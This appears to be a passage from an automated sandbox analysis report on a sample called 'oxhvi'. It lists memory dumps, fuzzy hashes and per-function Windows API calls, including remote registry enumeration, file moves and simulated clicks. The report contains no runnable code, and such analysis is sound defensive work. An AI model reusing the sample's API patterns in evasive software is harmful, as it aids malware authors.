                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                      • API String ID: 145871493-1355242751
                                                                                                                                                      • Opcode ID: 0cbf470d247ff3fa44c89499e13c806e646e081edb8c2c09e54c41d267fa0184
                                                                                                                                                      • Instruction ID: 8b68ac9a80396cffb07906b5f73c4d6b38e6d19f7a830fd90000df9d80afa5df
                                                                                                                                                      • Opcode Fuzzy Hash: 0cbf470d247ff3fa44c89499e13c806e646e081edb8c2c09e54c41d267fa0184
                                                                                                                                                      • Instruction Fuzzy Hash: 6DD01235652A216FC2222725EC18D9F7F24FE85B11749443DB904E3128CF64CD05D5F0
                                                                                                                                                      Function 005BACE6 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 005BAD86
                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 005BAD94
                                                                                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 005BADC7
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 005BAF9C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3488606520-0
                                                                                                                                                      • Opcode ID: 47888ec9d5e4253b8b38484c0691bf06999780a66f7c87d1173351f86d0be2d1
                                                                                                                                                      • Instruction ID: e4fbeb3ad020fbf86c58f1efeaf064465ac03ca24a16923b36f24a5b64ccacc2
                                                                                                                                                      • Opcode Fuzzy Hash: 47888ec9d5e4253b8b38484c0691bf06999780a66f7c87d1173351f86d0be2d1
                                                                                                                                                      • Instruction Fuzzy Hash: 3DA19BB1604701AFD720DF24C88AB6ABBE5BF84714F14885DF5999B2D2DB70EC41CB92
                                                                                                                                                      Function 005BC328 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
                                                                                                                                                        • Part of subcall function 005BD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005BC00D,?,?), ref: 005BD314
                                                                                                                                                        • Part of subcall function 005BD2F7: _wcslen.LIBCMT ref: 005BD350
                                                                                                                                                        • Part of subcall function 005BD2F7: _wcslen.LIBCMT ref: 005BD3C7
                                                                                                                                                        • Part of subcall function 005BD2F7: _wcslen.LIBCMT ref: 005BD3FD
                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005BC404
                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 005BC45F
                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 005BC4C2
                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 005BC505
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 005BC512
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 826366716-0
                                                                                                                                                      • Opcode ID: eb4fa606e2b137daa7ed82ea86851f7c668d421a8b3887ad23f50ad5876b8028
                                                                                                                                                      • Instruction ID: 57d0e18fed8022e50a97c435659996b83d7f389ea179063025a8df5dd972f616
                                                                                                                                                      • Opcode Fuzzy Hash: eb4fa606e2b137daa7ed82ea86851f7c668d421a8b3887ad23f50ad5876b8028
                                                                                                                                                      • Instruction Fuzzy Hash: 67615D31208241AFD714DF24C495E6ABFE5BF84308F54899CF55A8B2A2DB31FD45CB92
                                                                                                                                                      Function 0059EC27 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0059E60C: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0059D6E2,?), ref: 0059E629
                                                                                                                                                        • Part of subcall function 0059E60C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0059D6E2,?), ref: 0059E642
                                                                                                                                                        • Part of subcall function 0059E9C5: GetFileAttributesW.KERNELBASE(?,0059D755), ref: 0059E9C6
                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0059EC9F
                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0059ECD8
                                                                                                                                                      • _wcslen.LIBCMT ref: 0059EE17
                                                                                                                                                      • _wcslen.LIBCMT ref: 0059EE2F
                                                                                                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0059EE7C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3183298772-0
                                                                                                                                                      • Opcode ID: 5ad1301e0c45401fce226b455dbc0e0cb1c661438832e828380f7b1cfc3e1eff
                                                                                                                                                      • Instruction ID: 8c83fa0830a5042484a3f78183f1ed4b66c9e9b2c122cf3a78691a158281642f
                                                                                                                                                      • Opcode Fuzzy Hash: 5ad1301e0c45401fce226b455dbc0e0cb1c661438832e828380f7b1cfc3e1eff
                                                                                                                                                      • Instruction Fuzzy Hash: 8B5156B24083469BDB64DB54D8959DBBBECBFC4310F00092EF689D3151EF74E6888756
                                                                                                                                                      Function 005623E1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                      • Opcode ID: c2c19803574cce5037f9770aab2ba4857e958193a7921210233b4cd89ee42a78
                                                                                                                                                      • Instruction ID: 2100fe098e378247506779ede08e9a1090849647bad285db3f5fcc63757b07a0
                                                                                                                                                      • Opcode Fuzzy Hash: c2c19803574cce5037f9770aab2ba4857e958193a7921210233b4cd89ee42a78
                                                                                                                                                      • Instruction Fuzzy Hash: 6941C132A006149FDB20DF78C885A59BBF6FF88314F1585A9E915EB391EA31ED01CB81
                                                                                                                                                      Function 005A41CE Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetInputState.USER32 ref: 005A4225
                                                                                                                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 005A427C
                                                                                                                                                      • TranslateMessage.USER32(?), ref: 005A42A5
                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 005A42AF
                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005A42C0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2256411358-0
                                                                                                                                                      • Opcode ID: da139b829660ca191ca2723423063a6db48b5ea1c95b1f78ace4d27b204de465
                                                                                                                                                      • Instruction ID: b3861a6f01a97b7977b9c1c9456014e96f8a2f2430dd5cba0e9ceb92935667f9
                                                                                                                                                      • Opcode Fuzzy Hash: da139b829660ca191ca2723423063a6db48b5ea1c95b1f78ace4d27b204de465
                                                                                                                                                      • Instruction Fuzzy Hash: D73186745442429EEF25C7A4984DBBB3FA8BF52304F04496EE462C21A0E7F49889DF21
                                                                                                                                                      Function 00592191 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 005921A5
                                                                                                                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 00592251
                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 00592259
                                                                                                                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 0059226A
                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00592272
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3382505437-0
                                                                                                                                                      • Opcode ID: 3b2f07e4b099fa15f48a43a787c25f058e86daf2f06deda5a329d45ba2e3da6a
                                                                                                                                                      • Instruction ID: 88a7f033ef2b18fd68bf14fec3335694f4e9c4aa384d9e5ca17c5ac13e1ea48c
                                                                                                                                                      • Opcode Fuzzy Hash: 3b2f07e4b099fa15f48a43a787c25f058e86daf2f06deda5a329d45ba2e3da6a
                                                                                                                                                      • Instruction Fuzzy Hash: 1D319C75900219EFDF04CFA8DD89A9E3BB5FB14315F104229FA25EB2D0C770A954DBA0
                                                                                                                                                      Function 005C6065 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 005C60A4
                                                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 005C60FC
                                                                                                                                                      • _wcslen.LIBCMT ref: 005C610E
                                                                                                                                                      • _wcslen.LIBCMT ref: 005C6119
                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 005C6175
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$_wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 763830540-0
                                                                                                                                                      • Opcode ID: b0ac9b6af034564c01170ba0a355a97c34d64097a8cef4098291e5475f31ef88
                                                                                                                                                      • Instruction ID: 8d1f1c27cea6cd22b01953f7da6d0deee49ffd21370111e256eb0e0dd5d2f061
                                                                                                                                                      • Opcode Fuzzy Hash: b0ac9b6af034564c01170ba0a355a97c34d64097a8cef4098291e5475f31ef88
                                                                                                                                                      • Instruction Fuzzy Hash: 89215075900219AFDB109FE4CC88EEEBFB8FB45724F14461AF925EA181D7709A85CF50
                                                                                                                                                      Function 0059089E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,005907D1,80070057,?,?,?,00590BEE), ref: 005908BB
                                                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005907D1,80070057,?,?), ref: 005908D6
                                                                                                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005907D1,80070057,?,?), ref: 005908E4
                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005907D1,80070057,?), ref: 005908F4
                                                                                                                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005907D1,80070057,?,?), ref: 00590900
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3897988419-0
                                                                                                                                                      • Opcode ID: 062d3201c3eb12ce70a2ffec732ea4dbf2a70d9100c74b8ca900f8666f1a1f22
                                                                                                                                                      • Instruction ID: f8240efe8c86d7507017a15270b7c9b39eb2843068bed3d6dcc3f1e5d45a8cd2
                                                                                                                                                      • Opcode Fuzzy Hash: 062d3201c3eb12ce70a2ffec732ea4dbf2a70d9100c74b8ca900f8666f1a1f22
                                                                                                                                                      • Instruction Fuzzy Hash: B5017C72600608AFDB104F64DC04FAA7EBDFB88751F105824F905D2251D770DD00ABA0
                                                                                                                                                      Function 005A0BCB Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,005A0A39,?,005A3C56,?,00000001,00573ACE,?), ref: 005A0BE0
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,005A0A39,?,005A3C56,?,00000001,00573ACE,?), ref: 005A0BED
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,005A0A39,?,005A3C56,?,00000001,00573ACE,?), ref: 005A0BFA
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,005A0A39,?,005A3C56,?,00000001,00573ACE,?), ref: 005A0C07
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,005A0A39,?,005A3C56,?,00000001,00573ACE,?), ref: 005A0C14
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,005A0A39,?,005A3C56,?,00000001,00573ACE,?), ref: 005A0C21
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                      • Opcode ID: 676ee351017d50cfbd3f257083e48f305c662cadc4b596c7be61913a7bdb3f4e
                                                                                                                                                      • Instruction ID: ccc0c84bccc64280e4e4415070509381672601cad025f764e11a7b3380043ea6
                                                                                                                                                      • Opcode Fuzzy Hash: 676ee351017d50cfbd3f257083e48f305c662cadc4b596c7be61913a7bdb3f4e
                                                                                                                                                      • Instruction Fuzzy Hash: BF01EE71800B16CFCB30AF66D98080AFBF9FF603193009A3ED09242971C7B1A889CF90
                                                                                                                                                      Function 005964D3 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 005964E7
                                                                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 005964FE
                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 00596516
                                                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 00596532
                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 0059654C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3741023627-0
                                                                                                                                                      • Opcode ID: 3e910fbc603ad959526a5b14a101a90065342f0d50d168809ca3773cea63c55d
                                                                                                                                                      • Instruction ID: 472ab51b31d6f5051cef7a3e7a57e8b5f6ee62fb5ad6023991fb1110ec2637d6
                                                                                                                                                      • Opcode Fuzzy Hash: 3e910fbc603ad959526a5b14a101a90065342f0d50d168809ca3773cea63c55d
                                                                                                                                                      • Instruction Fuzzy Hash: 2D018630500B04ABEF255B10DE4EF967BB8FB20705F410569B587A14E1DBF4AA9CDB60
                                                                                                                                                      Function 00562630 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _free.LIBCMT ref: 0056264E
                                                                                                                                                        • Part of subcall function 00562D58: RtlFreeHeap.NTDLL(00000000,00000000,?,0056DB71,00601DC4,00000000,00601DC4,00000000,?,0056DB98,00601DC4,00000007,00601DC4,?,0056DF95,00601DC4), ref: 00562D6E
                                                                                                                                                        • Part of subcall function 00562D58: GetLastError.KERNEL32(00601DC4,?,0056DB71,00601DC4,00000000,00601DC4,00000000,?,0056DB98,00601DC4,00000007,00601DC4,?,0056DF95,00601DC4,00601DC4), ref: 00562D80
                                                                                                                                                      • _free.LIBCMT ref: 00562660
                                                                                                                                                      • _free.LIBCMT ref: 00562673
                                                                                                                                                      • _free.LIBCMT ref: 00562684
                                                                                                                                                      • _free.LIBCMT ref: 00562695
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                      • Opcode ID: e52b8c4148f719c4e32b456719e155032b01f1ab7fce74edb3958a36bd76e80e
                                                                                                                                                      • Instruction ID: fd1bd5c3254587a09bcd09bec803305519aac9da491ddc5d79b0068ae9bca5d1
                                                                                                                                                      • Opcode Fuzzy Hash: e52b8c4148f719c4e32b456719e155032b01f1ab7fce74edb3958a36bd76e80e
                                                                                                                                                      • Instruction Fuzzy Hash: D4F03A708919228BCB01AFA4EC0985A3FF6BF25791701120FF414E7275DB740A43BFA5
                                                                                                                                                      Function 005B6B2D Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 005505D2: EnterCriticalSection.KERNEL32(0060170C,?,00000000,?,0053D1DA,00603540,00000001,00000000,?,?,005AEF39,?,?,00000000,00000001,?), ref: 005505DD
                                                                                                                                                        • Part of subcall function 005505D2: LeaveCriticalSection.KERNEL32(0060170C,?,0053D1DA,00603540,00000001,00000000,?,?,005AEF39,?,?,00000000,00000001,?,00000001,00602430), ref: 0055061A
                                                                                                                                                        • Part of subcall function 00550433: __onexit.LIBCMT ref: 00550439
                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 005B6B95
                                                                                                                                                        • Part of subcall function 00550588: EnterCriticalSection.KERNEL32(0060170C,00000000,?,0053D208,00603540,005727E9,00000001,00000000,?,?,005AEF39,?,?,00000000,00000001,?), ref: 00550592
                                                                                                                                                        • Part of subcall function 00550588: LeaveCriticalSection.KERNEL32(0060170C,?,0053D208,00603540,005727E9,00000001,00000000,?,?,005AEF39,?,?,00000000,00000001,?,00000001), ref: 005505C5
                                                                                                                                                        • Part of subcall function 005A3EF6: LoadStringW.USER32(00000066,?,00000FFF,005CDCEC), ref: 005A3F3E
                                                                                                                                                        • Part of subcall function 005A3EF6: LoadStringW.USER32(?,?,00000FFF,?), ref: 005A3F64
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
